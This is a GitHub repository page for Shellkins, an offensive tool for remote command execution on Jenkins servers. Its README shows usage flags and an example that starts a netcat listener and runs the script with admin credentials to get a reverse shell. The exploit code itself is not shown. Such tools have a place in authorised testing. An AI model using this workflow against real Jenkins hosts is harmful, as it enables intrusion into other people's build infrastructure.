Skip to content

xiosec/Shellkins

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Shellkins

xiosec - Shellkins stars - Shellkins forks - Shellkins GitHub release License issues - Shellkins

Jenkins Remote Command Execution

Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery.

Usage

$ python3 shellkins.py --help
usage: shellkins.py [-h] [--host HOST] [-u USER] [-p PASS] [--lhost LHOST] [--lport LPORT]

Jenkins Remote Command Execution
github : https://github.com/xiosec/Shellkins
by xiosec

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           jenkins host address
  -u USER, --user USER  jenkins account username
  -p PASS, --pass PASS  jenkins account password
  --lhost LHOST         local listener address
  --lport LPORT         local listener port

Example

Clone this repository

$ git clone https://github.com/xiosec/Shellkins.git

Run a listener (on your machine)

$ nc -nlvp 1234

Run the script

$ python3 shellkins.py --host http://example.com:8080/ --user admin --pass admin --lhost 127.0.0.1 --lport 1234

License

Released under MIT by @xiosec.

About

jenkins remote code execution

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages